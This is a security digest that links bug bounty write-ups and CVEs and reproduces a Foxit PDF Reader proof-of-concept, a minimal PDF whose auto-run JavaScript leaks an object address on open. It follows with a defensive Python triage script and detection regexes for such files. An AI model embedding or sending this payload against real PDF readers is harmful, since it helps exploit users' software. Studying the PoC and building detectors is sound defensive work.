[Concrete CMS] Path traversal in the admin backend leading to RCE (CVE-2021-40097) https://hackerone.com/reports/1102067
[Concrete CMS] Stored XSS in calendar events via CSRF (CVE-2021-40108) https://hackerone.com/reports/1102018
1. An iCloud XSS that paid a $9,000 bounty https://bountyget.medium.com/how-i-got-9000-usd-by-hacking-into-icloud-80ed8816d3b5
2. RCE on mobile.starbucks.com.sg (and more) for a $5,600 bounty https://bountyget.medium.com/rce-on-starbucks-singapore-and-more-for-5600-926c930bb61e
3. An unexpected IDOR https://bountyget.medium.com/unexpected-idor-vulnerability-in-redacted-redacted-net-write-up-95fc6f10de6c
4. Apache <= 2.4.48 - mod_proxy SSRF (CVE-2021-40438) https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40438.yaml https://firzen.de/building-a-poc-for-cve-2021-40438
5. Foxit PDF Reader 1-day info leak PoC https://twitter.com/l33d0hyun/status/1448963734949412866 poc.pdf:
%PDF
% Minimal file: no xref table, no endobj; Foxit rebuilds the object table by scanning.
1 0 obj
<< /Pages 1 0 R /OpenAction 2 0 R >>
% /OpenAction runs object 2 as soon as the document opens, with no user interaction.
2 0 obj
<< /S /JavaScript /JS ( app.alert(util.printf("Leak : %#lx", app)); ) >>
trailer
<< /Root 1 0 R >>
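The PoC above leaks an object address because util.printf is handed a non-string argument (the app object) for a %#lx conversion, and /OpenAction makes it fire with no click. The following triage script is an added example written for this digest, not l33d0hyun's code: it scans a PDF the way a lenient reader does (no xref, no endobj), follows trailer /Root -> /OpenAction -> /JavaScript, and flags util.printf with an address-revealing conversion. The sample inputs are constructed inline: the page's PoC byte string and a benign control file.

```python
"""Static triage of PDFs that auto-run JavaScript on open (added example)."""
import re

# Constructed sample: the Foxit 1-day PoC from the page, whitespace aside.
POC_PDF = (
    b"%PDF 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R>> "
    b"2 0 obj <</S /JavaScript /JS ( app.alert(util.printf(\"Leak : %#lx\", app)); )>> "
    b"trailer <</Root 1 0 R>>"
)

# Constructed benign control: same minimal skeleton, no OpenAction.
BENIGN_PDF = (
    b"%PDF 1 0 obj <</Type /Catalog /Pages 2 0 R>> "
    b"2 0 obj <</Type /Pages /Kids [] /Count 0>> "
    b"trailer <</Root 1 0 R>>"
)

# 'N G obj <<...>>' found by scanning, because a PoC like this carries no xref table.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(<<.*?>>)", re.S)
# '/Key N G R' indirect references inside a dictionary.
REF_RE = re.compile(rb"/(\w+)\s+(\d+)\s+\d+\s+R")
ROOT_RE = re.compile(rb"trailer\s*<<.*?/Root\s+(\d+)\s+\d+\s+R", re.S)
# Greedy: the JS literal itself contains parentheses, so take up to the closing '>>'.
JS_RE = re.compile(rb"/JS\s*\((.*)\)\s*>>", re.S)
# util.printf with %x / %lx / %#lx / %p applied to a bare identifier, not a string
# literal: the pattern that turns a format conversion into an object address leak.
LEAK_RE = re.compile(
    rb"util\.printf\s*\(\s*\"[^\"]*(%#?l?[xXp])[^\"]*\"\s*,\s*([A-Za-z_][\w.]*)\s*\)"
)


def parse_objects(data):
    """Map object number -> raw dictionary bytes, recovered by scanning."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}


def resolve_ref(dictionary, key):
    """Return the object number that /key references, or None."""
    for m in REF_RE.finditer(dictionary):
        if m.group(1) == key:
            return int(m.group(2))
    return None


def extract_js(action):
    """Return the script of a /S /JavaScript action dictionary, or None."""
    if action is None or b"/JavaScript" not in action:
        return None
    m = JS_RE.search(action)
    return m.group(1).strip() if m else None


def triage(data):
    """Return a list of human-readable findings; empty means nothing suspicious."""
    findings = []
    objects = parse_objects(data)
    root = ROOT_RE.search(data)
    if root is None:
        return findings
    catalog = objects.get(int(root.group(1)), b"")
    action_num = resolve_ref(catalog, b"OpenAction")
    if action_num is None:
        return findings
    findings.append("OpenAction: an action fires as soon as the document opens")
    js = extract_js(objects.get(action_num))
    if js is None:
        return findings
    findings.append("OpenAction is a /JavaScript action")
    leak = LEAK_RE.search(js)
    if leak:
        findings.append(
            "util.printf %s on non-string argument '%s': object address leak"
            % (leak.group(1).decode(), leak.group(2).decode())
        )
    return findings


if __name__ == "__main__":
    for name, sample in (("poc.pdf", POC_PDF), ("benign.pdf", BENIGN_PDF)):
        print(name, triage(sample) or ["clean"])
```

This is triage for the bare PoC style shown above, not a general PDF scanner: real-world samples hide the script in FlateDecode streams, hex strings, /Names trees or incremental updates, and the regexes here see none of that. Treat a hit as a reason to open the file in a sandboxed reader, and a miss as no information.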